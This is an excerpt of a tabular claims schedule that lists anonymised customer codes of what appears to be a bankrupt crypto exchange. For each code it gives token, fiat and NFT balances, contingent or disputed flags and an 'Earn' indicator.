| 07401633 | | BTC[.0000482], CUSDT[3], DOGE[7], ETH[0], ETHW[0], SHIB[2], TRX[4], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity|NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07401638 | | BTC[.00716], CUSDT[1], DOGE[1], SHIB[1], SOL[31.2212998], TRX[2], USD[0.00] | Yes | |
| 07401645 | | BF_POINT[300], ETH[1.09949397], SHIB[2], SOL[0.00071266], USD[0.00] | | |
| 07401653 | | BRZ[1], CUSDT[1], DOGE[5631.48376824], USD[0.00] | | |
| 07401654 | | USD[0.00] | | |
| 07401658 | | BTC[0.00004312], SOL[.00098595], USD[0.00], USDT[0] | | |
| 07401660 | | SOL[11.4424246], USD[9.11] | | |
| 07401663 | | USD[0.78] | | |
| 07401665 | | BRZ[1], CUSDT[3], DOGE[1], USD[0.00] | | |
| 07401673 | Contingent, Disputed | BAT[1], BRZ[1], BTC[0], CUSDT[1], DOGE[1], ETH[0], ETHW[0], USD[0.00] | | |
| 07401675 | | BRZ[5.06214068], CUSDT[7], DOGE[1], ETH[0.00002446], ETHW[3.37767638], GRT[2.00077166], SHIB[1], TRX[5], USD[449.09], USDT[1.00021912] | Yes | |
| 07401677 | | BAT[3], BRZ[1], CUSDT[17], DOGE[58.66444324], EUR[41.69], GRT[4.00003715], TRX[4.00002587], USD[0.70], USDT[50.72036718] | | |
| 07401678 | | BAT[1], BRZ[1], CUSDT[3], DOGE[5], ETH[2.34985776], ETHW[2.34985776], SHIB[2], TRX[1], USD[0.00], USDT[1], YFI[0] | | |
| 07401680 | | USD[0.01] | | |
| 07401691 | | DOGE[ 998], GRT[200.799], SOL[.5], USD[245.50], YFI[.000852] | | |
| 07401693 | | AAVE[0], BTC[1.81961705], DOGE[1], LINK[.00000001], NFT (439561940000704124/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #75)[1], NFT (469041818978347971/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #78)[1], NFT (485582279512494552/Rubber Duckie #0026 - Cancer )[1], SOL[0], USD[0.01] | Yes | |
| 07401696 | | BRZ[2], CUSDT[3], DOGE[.00003764], TRX[4], USD[0.00] | | |
| 07401699 | | BAT[0], BTC[0], SUSHI[0], TRX[0] | | |
| 07401700 | Contingent, Disputed | SOL[0], USDT[0.00001595] | | |
| 07401701 | | BAT[2.12930423], BRZ[1], BTC[0.03387070], TRX[1], USD[0.00] | Yes | |
| 07401702 | | BAT[1], BRZ[3], CUSDT[1], GRT[1], TRX[3], USD[0.00] | | |
| 07401703 | | TRX[1], USD[0.01] | | |
| 07401704 | | BTC[0], SOL[0], USD[0.00] | | |
| 07401705 | | DOGE[337.658721], TRX[356.78568918], USD[0.00] | | |
| 07401706 | | DOGE[1], TRX[2], USD[0.00] | | |
| 07401708 | | CUSDT[4], USD[0.09] | | |
| 07401715 | | CUSDT[2], DOGE[23196.26624763], TRX[1], USD[0.00] | | |
| 07401717 | | USD[0.00], USDT[0.00000001] | | |
| 07401720 | | BRZ[1], BTC[.08347218], CUSDT[31], DOGE[9.33998444], ETH[.77042852], ETHW[.77010501], TRX[7], USD[5.72] | Yes | |
| 07401725 | | BTC[0.00213107], ETH[0.00000001], ETHW[0], JPY[118.90], MATIC[1], NFT (308101988961980051/Don Carlos 1)[1], NFT (313374350148447389/Desert Skull)[1], NFT (314790441030151707/MagicEden Vaults)[1], NFT (325263646756715671/MagicEden Vaults)[1], NFT (365200832153901467/Boar Bandit #399)[1], NFT (398626253720980045/MagicEden Vaults)[1], NFT (424389548400414182/MagicEden Vaults)[1], NFT (425687005928695930/MagicEden Vaults)[1], NFT (432243397785588202/The Direction)[1], NFT (470151822181136095/Entrance Voucher #3223)[1], SOL[0.00000001], USD[0.00], USDT[0.00000001] | | |
| 07401730 | | BTC[0.00000876], ETH[.000688], ETHW[.000688], LTC[.00428686], SOL[.0075], USD[0.06], USDT[.05572184] | | |
| 07401743 | | BRZ[2], CUSDT[8], DOGE[5768.54857462], ETH[1.18896586], ETHW[1.18846645], SHIB[1], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07401744 | | NFT (420298398067469468/FTX - Off The Grid Miami #2153)[1], NFT (448280086582365057/Entrance Voucher #29450)[1], NFT (511769109415065187/Coachella x FTX Weekend 1 #10672)[1], USD[22242.42], USDT[0.00672437] | | |
| 07401751 | | CUSDT[1], DOGE[1], USD[0.00] | Yes | |
| 07401756 | | USD[2.23] | | |
| 07401757 | | BRZ[3], BTC[0], CUSDT[9], GRT[2.00082455], SHIB[.00000001], TRX[25.4323291], USD[0.01], USDT[1.04558100] | Yes | |
| 07401758 | | CUSDT[2], DOGE[144.00322394], USD[7.30] | | |
| 07401763 | | USD[0.01], USDT[0] | | |
| 07401764 | | USD[2000.00] | | |
| 07401765 | | TRX[1], USD[0.01] | | |
| 07401773 | | CUSDT[1], DOGE[0], ETH[0], SHIB[1], TRX[0], USD[258.92], USDT[0] | Yes | |
| 07401775 | | DOGE[1], USD[0.00] | Yes | |
| 07401777 | | BAT[1.01655549], BRZ[2], CUSDT[4], DOGE[100.61130972], GRT[.28488814], KSHIB[13249.19054495], SHIB[18907034.80998961], TRX[1], USD[0.01] | Yes | |
| 07401778 | | CUSDT[11], DOGE[2193.17006074], ETH[0], ETHW[0], TRX[11], USD[0.00] | | |
| 07401782 | | BRZ[0], BTC[0], CUSDT[3], DAI[0], ETH[0], GBP[0.00], LINK[0], UNI[0], USDT[0] | | |
| 07401790 | | BAT[332.98842653], BRZ[1], CUSDT[4], DOGE[14], ETH[.06541643], ETHW[.06541643], GRT[28.44305255], LINK[5.50764715], SOL[.92744476], TRX[2549.77776399], USD[0.00] | | |
| 07401792 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07401794 | | DOGE[1], GRT[43.08660772], LINK[.31349369], USD[0.00] | | |
| 07401796 | | BAT[7.76485822], DOGE[86.70421614], GRT[8.1736363], USD[0.00], USDT[0.00055255] | | |
| 07401799 | | BAT[1.0139826], BRZ[2], CUSDT[6], GRT[1], LTC[3.88937717], MATIC[1.01475614], TRX[4], UNI[3.39362179], USD[1566.62], USDT[1.10256267] | Yes | |
| 07401805 | | BTC[0], DOGE[0], ETH[0], GRT[0], SOL[0], USD[0.00] | | |
| 07401808 | | LTC[0], TRX[0] | | |
| 07401809 | | USD[0.52] | | |
| 07401811 | | SOL[0] | | |
| 07401813 | | TRX[1], USD[0.00] | | |
| 07401816 | | CUSDT[2], ETH[.25477983], ETHW[.25458645], SOL[2.70585341], USD[0.00] | Yes | |
| 07401817 | | BRZ[1], CUSDT[3], DOGE[3], GRT[2.05917945], LINK[1.09910206], SOL[0.68344195], TRX[1], USD[0.00], USDT[1.0991289] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07401821 | | BTC[.0000985], USD[17.16] | | |
| 07401826 | | BAT[1], BTC[0.01234814], CUSDT[2], DOGE[0] | | |
| 07401829 | | ETH[.00000001], ETHW[0] | | |
| 07401830 | | DOGE[21.1428604], USD[0.00], USDT[.99430797] | | |
| 07401837 | | CUSDT[15], DOGE[1], TRX[3], USD[0.01] | | |
| 07401839 | | BAT[2.12878601], BTC[.22963569], CUSDT[5], DOGE[1], ETH[.04398103], ETHW[.04343383], GRT[1.00459298], NFT (399750621233396499/Entrance Voucher #4068)[1], SHIB[3], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07401841 | | USD[0.35] | Yes | |
| 07401845 | | USD[0.00] | | |
| 07401846 | | CUSDT[1], DOGE[2], USD[0.00] | | |
| 07401854 | | DOGE[1], UNI[0], USD[0.00] | | |
| 07401857 | | USD[0.09], USDT[0.00000001] | Yes | |
| 07401860 | | BTC[0], CUSDT[2], DOGE[4.50698], ETH[0], SOL[0], TRX[1], USD[0.00], USDT[0] | | |
| 07401862 | Contingent, Disputed | BCH[.00033226], BRZ[3], CUSDT[596.41190817], DOGE[0], GRT[0], LINK[.00003721], TRX[1], USD[0.95] | | |
| 07401871 | | BRZ[2], CUSDT[38], DOGE[.00004525], GRT[1.00496203], MATIC[1.00563432], TRX[1], USD[0.00] | Yes | |
| 07401885 | | BRZ[1], CUSDT[3], DOGE[3], USD[0.01] | | |
| 07401894 | | BTC[0], SOL[0.23544806], USD[3.29] | | |
| 07401897 | | BRZ[1], CUSDT[4], DOGE[1], TRX[1.90858646], USD[0.02] | | |
| 07401903 | | AVAX[11.43574798], BRZ[4], BTC[.00210854], CUSDT[3], DOGE[5466.81539022], ETH[3.6738508], ETHW[3.67230774], GRT[477.95348419], LINK[71.4120975], LTC[4.01143169], MATIC[1279.00482084], NFT (324929841736562646/ivy #2)[1], NFT (365999053158891469/Sunset #446)[1], NFT (371990889616829756/Entrance Voucher #2954)[1], NFT (510380478659120523/APEFUEL by Almond Breeze #889)[1], NFT (511976418436771187/Imola Ticket Stub #549)[1], SHIB[20], SOL[52.70183613], TRX[7], USD[0.00], USDT[0] | Yes | |
| 07401910 | | USD[100.00] | | |
| 07401913 | | BAT[2.00715243], CUSDT[22], DOGE[2], ETHW[.02842629], GRT[29.80625238], SHIB[6271037.85311863], SUSHI[2.04365995], TRX[1], USD[706.85], USDT[0] | | |
| 07401925 | | BTC[.0001331], SOL[.843], SUSHI[.4225], USD[0.18], USDT[.45276] | | |
| 07401935 | | DOGE[1], LINK[15.12108674], USD[0.00] | | |
| 07401942 | | USD[0.00] | | |
| 07401946 | | UNI[0], USD[33.74] | Yes | |
| 07401956 | | USD[0.00], USDT[0.00000011] | | |
| 07401959 | | BRZ[1], BTC[.00004703], CUSDT[3], DOGE[1.23087963], LTC[.00381882], TRX[.54830161], USD[0.00], USDT[0.00067425] | | |
| 07401965 | | BCH[0], BTC[0.01138398], DOGE[0], ETH[0.20318937], ETHW[0.20318937], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07401971 | | CUSDT[1], DOGE[2], LINK[2.82995676], USD[200.20] | | |
| 07401974 | | BTC[0], CHF[0.00], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USDT[0.00000933], YFI[0] | | |
| 07401975 | | CUSDT[2], TRX[377.44002029], USD[0.00] | | |
| 07401983 | | CUSDT[1], DOGE[1.36371402], GRT[.4302301], TRX[1.91703226], USD[0.00], USDT[0.00000001] | | |
| 07401993 | | DOGE[22.82261696], USD[0.36] | | |
| 07402003 | | BAT[1.0165555], BRZ[1], CUSDT[5], DAI[.1790585], DOGE[.00499341], KSHIB[0.63944394], MATIC[.00003708], SHIB[1], SUSHI[.0286397], TRX[2], USD[0.00], USDT[2.19625589] | Yes | |
| 07402008 | | DOGE[158.54022986], USD[0.00] | | |
| 07402010 | | CUSDT[1], SHIB[442744.25723837], USD[0.00] | Yes | |
| 07402011 | | DOGE[0], USD[0.00] | Yes | |
| 07402012 | | BRZ[1], CUSDT[3], DOGE[0], TRX[1], USD[0.01] | Yes | |
| 07402016 | | BTC[.00103433], CUSDT[1054.67771488], DOGE[9623.68917609], LINK[1.09816346], TRX[4], USD[291.65] | Yes | |
| 07402019 | | BAT[1], BRZ[1], BTC[0.00841448], CUSDT[2], DOGE[5], TRX[3], USD[0.00], USDT[0.00000001] | | |
| 07402030 | | BTC[.00006714], DOGE[.4255], ETHW[.55], SOL[.08936], USD[0.26], USDT[0] | | |
| 07402031 | Contingent, Disputed | USD[0.56], USDT[.007676] | | |
| 07402041 | | BAT[1.0165555], BRZ[1], CUSDT[4], TRX[9800.28940791], USD[0.00] | Yes | |
| 07402047 | | BRZ[1], CUSDT[2], USD[0.00], USDT[1] | | |
| 07402049 | | BTC[0], TRX[0] | | |
| 07402057 | | BTC[.000092], SOL[.056], TRX[.444], USD[0.01] | | |
| 07402059 | | BRZ[2], CUSDT[6], GRT[1], SHIB[2], TRX[3], USD[0.00] | | |
| 07402068 | | ALGO[2920.93153679], DOGE[1806.8839279], GRT[578.29182263], LTC[.64476612], SOL[8.37685346], TRX[2], USD[0.00] | Yes | |
| 07402071 | | BRZ[1], CUSDT[2], DOGE[4.29978785], TRX[1], USD[0.30], USDT[0] | | |
| 07402073 | | CUSDT[1], DOGE[2], USD[0.01] | | |
| 07402074 | | CUSDT[1], USD[4.69], USDT[1] | | |
| 07402080 | | DAI[10], MATIC[5.99], SOL[.00374], USD[2.50], USDT[0] | | |
| 07402083 | | BAT[16.90896175], BCH[.10584791], BF_POINT[100], GRT[62.18263322], LINK[6.62537625], SOL[13.13860906], SUSHI[25.13675994], TRX[371.41268337], UNI[5.58839129], USD[0.00], USDT[0] | Yes | |
| 07402089 | | BRZ[1], CUSDT[1], MATIC[121.98253619], USD[0.01], USDT[0] | Yes | |
| 07402096 | | BRZ[1], CUSDT[6], DOGE[3], ETH[1.22973793], ETHW[1.22922135], LINK[.00033576], SOL[98.64497921], TRX[11.10046095], UNI[118.63353737], USD[0.00], USDT[3.26185206] | Yes | |
| 07402097 | | USD[0.01] | | |
| 07402099 | | BRZ[1], SHIB[30226969.93449753], TRX[3], USD[0.00] | | |
| 07402101 | | NFT (499759481759676811/Miami Ticket Stub #611)[1] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07402103 | | AAVE[.00466], AVAX[.0118], BTC[.0000931], DOGE[38], ETHW[.863851], LINK[.0998], LTC[.0064252], NFT (333041951564270978/7257)[1], NFT (408651386182124797/2385)[1], NFT (427366144251976638/2426)[1], NFT (531840420033922008/1731)[1], NFT (573605969617209503/3074)[1], SOL[.01698], SUSHI[.17267536], UNI[.0759], USD[0.00], YFI[.000956] | | |
| 07402104 | | DOGE[6929.57945759], TRX[1], USD[0.00] | Yes | |
| 07402105 | | BAT[1], CUSDT[1], TRX[1], USD[0.46], USDT[2] | | |
| 07402108 | | DOGE[1], LINK[.61518976], USD[5.00] | | |
| 07402109 | | DOGE[175.96321383], USD[0.00] | | |
| 07402120 | | CUSDT[1], DOGE[.00000712], GRT[0.00000002], TRX[0.00057557], USD[0.00], USDT[0] | | |
| 07402127 | | USD[0.00] | | |
| 07402128 | | BTC[.08178029], SOL[6.13], USD[1.29] | | |
| 07402135 | | ETH[0], SOL[1], USD[0.00], USDT[0] | | |
| 07402136 | | BRZ[1], CUSDT[2], DOGE[2], SOL[.00068617], TRX[.55941111], USD[0.00] | | |
| 07402140 | | BAT[0], BCH[0], BRZ[0], BTC[0], CAD[0.00], DOGE[1], ETH[0], GRT[0], LTC[0], SOL[0.10525804], SUSHI[0], UNI[0], USD[0.00], YFI[0] | Yes | |
| 07402143 | | AVAX[1.16849353], BAT[109.02268976], BRZ[1], BTC[0.00550130], DOGE[2122.64935056], ETH[0.04884300], ETHW[0.09589375], GRT[300.65531486], LINK[6.32946609], MATIC[34.39065039], NFT (437243703409227937/Sigma Shark #3973)[1], NFT (441887362699477111/DOTB #141)[1], SHIB[5748210.90679272], SOL[10.01778283], SUSHI[48.81748131], TRX[721.27307418], UNI[8.48401883], USD[0.00] | Yes | |
| 07402144 | | BCH[.0858699], BRZ[151.23017719], BTC[.05810757], CUSDT[19], DOGE[96.69780374], ETH[.13377077], ETHW[.1326988], EUR[545.91], LINK[21.18751563], LTC[1.71730613], NFT (560641134650094196/Joe Theismann's Playbook: Washington vs Chicago Bears - September 29, 1985 #80)[1], SOL[.29706103], TRX[164.55698448], USD[0.71], YFI[.00616937] | Yes | |
| 07402148 | | BRZ[1], CUSDT[1], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07402150 | | DOGE[.00003764], USD[0.00], USDT[0] | | |
| 07402151 | | AVAX[.02], BTC[0.00003863], USD[1.06] | | |
| 07402152 | | DOGE[.475], USD[1.61], USDT[0] | | |
| 07402154 | | DOGE[1], USD[0.00] | | |
| 07402160 | | DOGE[0], PAXG[0], SOL[0], TRX[0], UNI[0], USD[0.00] | | |
| 07402162 | | BRZ[1], CUSDT[5], DOGE[4688.75056127], USD[0.00], USDT[1] | | |
| 07402163 | | USD[0.00], USDT[1] | | |
| 07402166 | | CUSDT[3], LINK[.051662], NFT (406200184269971802/#5762 Inverse Bear)[1], NFT (412494633804810515/#2797 Inverse Bear)[1], SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07402168 | | DOGE[0.00000001], GBP[0.00], SHIB[2], USD[0.00], USDT[0] | Yes | |
| 07402169 | | USD[0.00] | | |
| 07402173 | | BTC[0.00002201], SOL[55.69000000], USD[0.00], USDT[7.51683354] | | |
| 07402174 | | NFT (437177775074972908/Coachella x FTX Weekend 1 #25490)[1] | | |
| 07402175 | | USD[100.00] | | |
| 07402181 | | DOGE[0], LINK[0], LTC[0], SOL[0], USD[0.00], USDT[0.00000026], YFI[0] | Yes | |
| 07402182 | | DOGE[861.65733027], ETH[.07648617], ETHW[.07648617], USD[0.00] | | |
| 07402187 | | GRT[171.312], USD[0.79] | | |
| 07402188 | | BTC[0], DOGE[1], SOL[26.798838], USD[0.00], USDT[0.00000001] | Yes | |
| 07402190 | | CUSDT[2], DOGE[.61647183], TRX[1], USD[9.05] | | |
| 07402192 | | LTC[0], USD[0.00] | | |
| 07402193 | | CUSDT[3], DOGE[2.92940471], SUSHI[7.17063573], TRX[.02495326], USD[0.63] | | |
| 07402195 | | CUSDT[1], DOGE[224.22686429], USD[0.09] | | |
| 07402199 | | BRZ[2], CUSDT[2], DOGE[12827.94683152], TRX[1], USD[0.00] | | |
| 07402202 | | SHIB[385683.27909096], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07402205 | | BTC[.00001139], USD[0.00] | | |
| 07402206 | | USD[0.00] | | |
| 07402209 | | USD[50.00] | | |
| 07402215 | | BRZ[1], CUSDT[3], DOGE[3.04602779], TRX[2], USD[0.97] | | |
| 07402223 | | USD[19.27] | | |
| 07402225 | | DOGE[5417.66650302], USD[0.00] | | |
| 07402233 | | DOGE[1], USD[0.00] | | |
| 07402244 | | BAT[1], BRZ[36], CUSDT[14], GRT[5], LINK[2], TRX[16], UNI[2], USD[0.00], USDT[1] | | |
| 07402254 | | DOGE[1.00343793], ETH[0], LINK[0], MATIC[0], NFT (425690387675975956/Punk one)[1], SHIB[4], TRX[1], USD[4.58], USDT[0] | Yes | |
| 07402255 | | DOGE[0], USD[22.67] | | |
| 07402256 | | AAVE[.01636], AVAX[.0777], BCH[.003352], BTC[.0000702], DOGE[2.044], ETH[0.00425000], ETHW[0.00425000], LINK[.0368], LTC[.008], SOL[.24492055], SUSHI[.1645], TRX[.93], UNI[.01475], USD[0.00], USDT[0.00198168], YFI[.001917] | | |
| 07402264 | | DOGE[2], USD[0.01] | | |
| 07402265 | | ALGO[.053], ETHW[.00003301], NEAR[.0164], UNI[.0717], USD[2331.27], USDT[.0023566] | | |
| 07402268 | | USD[0.00] | | |
| 07402274 | | CUSDT[1], USD[0.34] | | |
| 07402284 | | CUSDT[1], USD[0.00] | | |
| 07402285 | | BF_POINT[400], BTC[.00045], SOL[0], USD[0.00] | Yes | |
| 07402287 | | BTC[0], ETH[0], USD[0.00] | | |
| 07402288 | | CUSDT[1], TRX[685.77566851], USD[0.00] | | |
| 07402292 | | CUSDT[8], DOGE[0.00399801], ETH[0], ETHW[0], TRX[1], USD[0.13] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07402296 | | ETH[0.00214152], ETHW[0.00214152], TRX[.00557291], USD[0.00] | | |
| 07402300 | | TRX[1], USD[0.00], USDT[3725.51751825] | | |
| 07402302 | | CUSDT[1], ETHW[.16972623], TRX[1], USD[0.00] | | |
| 07402307 | | TRX[.000236] | | |
| 07402313 | | BTC[0], DOGE[1.64805175], USD[0.00], USDT[0] | | |
| 07402323 | | BRZ[2], CUSDT[2.00029469], TRX[5], USD[0.00] | | |
| 07402330 | | USD[0.00] | | |
| 07402334 | | BTC[0], DOGE[0], ETH[0], SUSHI[0], USD[0.00], USDT[0.00000399] | | |
| 07402338 | | ETH[0], NFT (458573142293593553/ALPHA:RONIN #908)[1], NFT (563951693334532881/ALPHA:RONIN #696)[1], USD[0.18], USDT[0] | | |
| 07402341 | | BAT[5], BRZ[15], CUSDT[34], DOGE[4708.42923996], ETH[0], ETHW[0], GRT[3], SUSHI[1], TRX[10], USD[0.01], USDT[8] | | |
| 07402344 | | BTC[.00000048], CUSDT[1], DOGE[2], ETH[.00000402], ETHW[.44018913], SHIB[149.38538197], UNI[.00002965], USD[0.01] | Yes | |
| 07402348 | | BTC[0.00000001], NFT (531958318132639821/EvolutionApes#3552)[1], USD[0.00] | Yes | |
| 07402352 | | BTC[.00319417], CUSDT[1], USD[0.00] | | |
| 07402356 | | DOGE[0.00010514], GRT[0], SUSHI[16.30017796], USD[0.00] | | |
| 07402361 | | NFT (374944867739787952/Entrance Voucher #3378)[1] | | |
| 07402363 | | BAT[.00914495], BCH[0], CUSDT[2], DOGE[.64233867], LINK[.00066882], TRX[2], USD[0.01], USDT[0.00000375] | | |
| 07402373 | | SOL[0], USD[0.03], USDT[0] | | |
| 07402376 | | BTC[0.00019683], USDT[.7673] | | |
| 07402382 | | USDT[0] | | |
| 07402384 | | SUSHI[.136675], USD[0.01] | | |
| 07402385 | | BTC[0], ETH[.19162255], NFT (311247451917311874/MagicEden Vaults)[1], NFT (369586364096225640/Space Burns #5606)[1], NFT (382342873603879451/MagicEden Vaults)[1], NFT (468341508443298461/Cyber Frogs Ramen)[1], NFT (471998771980793223/Fancy Frenchies #969)[1], NFT (519433819716721660/Frog #463)[1], NFT (525576968544525258/MagicEden Vaults)[1], NFT (526341766574863410/Sigma Shark #3534)[1], NFT (526408569204370288/MagicEden Vaults)[1], NFT (538890403850846013/Golden bone pass)[1], NFT (567190320051222471/Sigma Shark #1683)[1], NFT (572705958313096647/MagicEden Vaults)[1], SHIB[23219370.88984031], USD[0.00], USDT[0] | Yes | |
| 07402388 | | CUSDT[1], DOGE[1770.57766439], TRX[117.2959992], USD[0.00] | Yes | |
| 07402405 | | BTC[0.00048132], CUSDT[1], ETH[.01199644], ETHW[.01184596], USD[0.00] | Yes | |
| 07402407 | | BAT[2.07031983], BRZ[4], CUSDT[9], DOGE[9.11542752], GRT[3.00135215], NFT (436653321950978653/Astral Apes #2837)[1], SHIB[3], TRX[9], UNI[1.08722167], USD[0.01], USDT[2.17148719] | Yes | |
| 07402413 | | BF_POINT[300] | Yes | |
| 07402416 | | BAT[1.0165555], BRZ[2], CUSDT[9], DOGE[3], SHIB[4], TRX[6], USD[33.67] | Yes | |
| 07402418 | | USD[431.80], USDT[0] | | |
| 07402422 | | CUSDT[1], DAI[9.91632446], DOGE[674.5078038], GRT[3.93275806], LINK[.27816722], LTC[.0839904], SOL[4.58169762], TRX[952.87964925], USD[0.00] | | |
| 07402428 | | TRX[7346.6908524] | Yes | |
| 07402431 | | DOGE[2], GRT[.00004169], LINK[.00001735], TRX[1], USD[0.01] | | |
| 07402435 | | BTC[0], DOGE[1.09], USD[0.06] | | |
| 07402436 | | BTC[.00001], NFT (485349817878586225/Ape #5513)[1], NFT (503131875972302885/Banana Boost)[1], NFT (507627353127845939/FTX Cap)[1], SOL[0], USD[0.06] | | |
| 07402445 | | DOGE[0], ETH[0.01919000], ETHW[0.01919000] | | |
| 07402448 | | DOGE[0], ETH[0], KSHIB[0], SHIB[393511.99450132], USD[0.00] | Yes | |
| 07402450 | | USD[0.01] | | |
| 07402457 | | BTC[.01760928], ETH[.12354615], ETHW[.12354615], LINK[14.04803565], LTC[1.01848476], TRX[2], UNI[24.47680949], USD[1.70] | | |
| 07402460 | | BRZ[553.18023118], CUSDT[1], DOGE[2], USD[0.01], USDT[1] | | |
| 07402463 | | BTC[0.00000183], DOGE[.548075], ETH[.00000001], LINK[.01875], LTC[.00505014], SOL[.00448842], TRX[.825575], USD[0.00], USDT[0] | | |
| 07402467 | | USD[0.00] | | |
| 07402468 | | BTC[0], DOGE[272610.50602785], ETH[0.83054424], ETHW[0.83054424] | | |
| 07402474 | | NFT (421884158356743517/Fortuo Distinctus #131)[1], USD[0.00] | | |
| 07402475 | | BAT[32.40599243], DOGE[3.000548], TRX[178.09005204], USD[0.00] | Yes | |
| 07402477 | | BAT[78.60827507], BTC[.00615773], CUSDT[2], DOGE[2266.61067959], GRT[1], TRX[802.91509354], USD[0.00] | | |
| 07402481 | | BAT[1], BRZ[1], BTC[.00000271], CUSDT[1], LINK[1.06196228], SHIB[1], TRX[2], USD[0.00], USDT[2.20054933] | Yes | |
| 07402485 | | ETH[.00000001], ETHW[0], SOL[0], USD[0.00], WBTC[0] | | |
| 07402489 | | CAD[0.00], KSHIB[34.78243605], USD[0.00] | | |
| 07402491 | | ETH[0], ETHW[0], LINK[0], NFT (561550028702889289/Entrance Voucher #5764)[1], SOL[0], USD[0.67], YFI[0.00000005] | Yes | |
| 07402493 | | DOGE[.27299788], USD[0.75] | | |
| 07402494 | | USD[104.58] | | |
| 07402499 | | BTC[.00031149], DOGE[.0474484], ETH[.00483022], ETHW[.00483022], GBP[0.02], SOL[.00000001], USD[0.00] | | |
| 07402501 | | TRX[0] | | |
| 07402503 | | BAT[190.77966794], BRZ[1], CUSDT[9395.53623167], DOGE[5828.00741422], TRX[3260.26828904], USD[5.00] | | |
| 07402506 | | DOGE[0], USD[0.00] | | |
| 07402510 | | USD[0.00] | | |
| 07402513 | | CUSDT[3], USD[0.00] | | |
| 07402518 | | DOGE[12189.22704167], GRT[1], TRX[1], USD[20.00] | | |
| 07402525 | | BRZ[1], BTC[.01271235], CUSDT[7], DOGE[643.67382577], ETH[.25759307], ETHW[.25759307], SHIB[202596.19286871], SOL[3.43472934], TRX[7], USD[5.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07402531 | | SOL[0], SUSHI[0], USD[1.04] | | |
| 07402533 | | CUSDT[2], TRX[.000001], USD[0.00] | | |
| 07402534 | | BTC[0], CUSDT[3], DOGE[0], TRX[1], USD[0.00] | | |
| 07402535 | | BTC[.04554748] | | |
| 07402536 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07402542 | | BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[0.00], USDT[0] | | |
| 07402543 | | BAT[1.0165555], BRZ[1], CUSDT[23.51773507], DOGE[9187.97111898], SHIB[976874.12722954], SOL[.93337231], TRX[5], USD[0.20] | Yes | |
| 07402544 | | BTC[.000353], GRT[4.99525], SOL[0], USD[0.01] | | |
| 07402549 | | BTC[0], CUSDT[1], ETHW[.10833185], GRT[1.00406753], MATIC[.01153056], NFT (388056772990065525/Series 1: Wizards #539)[1], NFT (507807400141626621/Series 1: Capitals #670)[1], SOL[0], TRX[2] | Yes | |
| 07402556 | | BRZ[1], CUSDT[8], DOGE[2], ETHW[1.51874625], GRT[2], MATIC[1.00126101], TRX[2], USD[0.00] | Yes | |
| 07402559 | | BRZ[3], CUSDT[2], SOL[24.49526552], USD[20.00] | | |
| 07402562 | | DOGE[2], SOL[1.28199995], USD[3.27] | | |
| 07402563 | | SOL[.00243704], USD[60.06] | | |
| 07402565 | | DOGE[0] | | |
| 07402566 | | ETH[0], ETHW[0], USD[0.98] | | |
| 07402567 | | USD[22828.69], USDT[0] | | |
| 07402571 | | BAT[1], BRZ[2], DOGE[9], TRX[1], USD[0.00] | | |
| 07402577 | | BAT[13.48147696], BRZ[1], DOGE[245.49372721], GRT[2.53209244], TRX[94.57874626], USD[0.03] | | |
| 07402583 | | USD[1.95], USDT[0] | | |
| 07402596 | | USD[0.00], USDT[0] | | |
| 07402600 | | BF_POINT[100], CUSDT[2], DOGE[642.07352610], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07402604 | | BRZ[1], BTC[0], DOGE[4], SHIB[8526420.51196596], SOL[0], USD[0.00] | Yes | |
| 07402615 | | USD[0.30], USDT[2.644776] | | |
| 07402616 | | DOGE[1], USD[0.00] | | |
| 07402619 | | CUSDT[6], DOGE[4], TRX[2], USD[0.54], USDT[1] | | |
| 07402620 | | DOGE[1], SHIB[2], SOL[.00704098], USD[0.01], USDT[1.05954048] | Yes | |
| 07402621 | | BRZ[1], CUSDT[4], DOGE[5], LINK[.00079505], SOL[0], UNI[.0004372], USD[0.00] | Yes | |
| 07402622 | | BTC[.00000307] | | |
| 07402634 | | BRZ[1], CUSDT[4], DOGE[5], LINK[.00079505], SOL[0], UNI[.0004372], USD[0.00] | | |
| 07402637 | | BTC[0], USD[0.04] | | |
| 07402638 | | USD[0.00] | | |
| 07402644 | | DOGE[1.00000441], TRX[1], USD[0.01] | | |
| 07402646 | | ETH[.005], ETHW[.005], USD[3.27] | | |
| 07402649 | | SOL[.0483], USD[0.01] | | |
| 07402650 | | USD[0.12], USDT[.000359] | | |
| 07402658 | | BRZ[8], CUSDT[3], GRT[1], TRX[5], USD[0.01] | | |
| 07402659 | | USD[10.00] | | |
| 07402660 | | TRX[85.06187975], USD[0.00] | Yes | |
| 07402664 | | SOL[0], USD[0.00] | | |
| 07402673 | | SOL[.00810847], USD[0.24] | | |
| 07402674 | | BRZ[0], BTC[0], ETH[0], SOL[0], SUSHI[0], USD[0.55] | | |
| 07402677 | | BTC[.00801433], DOGE[10.67923988], ETH[.16370106], ETHW[.16326449], TRX[3], USD[0.00] | Yes | |
